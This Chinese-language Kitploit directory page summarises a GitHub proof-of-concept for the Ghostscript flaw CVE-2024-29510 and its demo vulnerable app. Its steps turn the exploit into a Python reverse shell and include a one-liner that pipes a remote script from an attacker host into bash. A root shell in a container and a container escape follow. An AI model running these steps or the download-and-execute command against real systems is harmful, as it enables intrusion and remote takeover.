Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-29510 — CVE-2024-29510 的 POC 代码和演示 VulnApp | Kitploit
工具/GitHubGitHub/swsmith2391/cve-2024-29510
漏洞分析漏洞利用Web应用程序漏洞利用Payload 开发容器逃逸二进制利用
GitHubswsmith2391/cve-2024-29510

CVE-2024-29510

CVE-2024-29510 的 POC 代码和演示 VulnApp

查看仓库
1162年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

原始研究及POC代码:https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

注意:除执行的命令外,我未对POC做任何修改。全部功劳归功于 Codean Labs 的 Thomas Rinsma 的出色研究及POC。

本地场景

  1. 封装在stager脚本中,用于下载并运行检查脚本以判断主机是否存在漏洞
  2. 修改POC以下载并执行Python3反弹Shell
  3. Stager和反弹Shell通过标准输入下载并执行
  4. POC会在 /tmp 目录留下随机命名的文件

在攻击者主机上:

  1. 使用pwncat-cs或netcat,为443端口创建监听器
  2. 进入exploit目录
  3. python3 -m http.server 80

在受害者主机上(运行Ghostscript 10.01.2的Ubuntu 23.10):

  1. 打开终端并运行:export RHOST=''; wget -q http://$RHOST/run -O - | bash &

远程场景(VulnApp)

  1. 使用以下命令构建VulnApp:'docker build -t cve-2024-29510-demo:latest .'(需在Dockerfile目录下放置 https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10021/ghostscript-10.02.1.tar.gz 的副本)
  2. 使用以下命令运行VulnApp:'docker run --rm -p 5000:5000 cve-2024-29510-demo:latest'
  3. 尝试转换good.ps以测试功能。应返回一个渲染后的PDF,其中包含绘制箭头的线条,例如 '>'
  4. 在80端口上搭建托管shell.html的web服务器,例如 'python3 -m http.server 80'
  5. 使用pwncat-cs或netcat,为443端口创建监听器
  6. 上传bad.eps,VulnApp将挂起,监听器应捕获容器的反弹Shell(以root运行)
  7. 逃逸出容器!
下载工具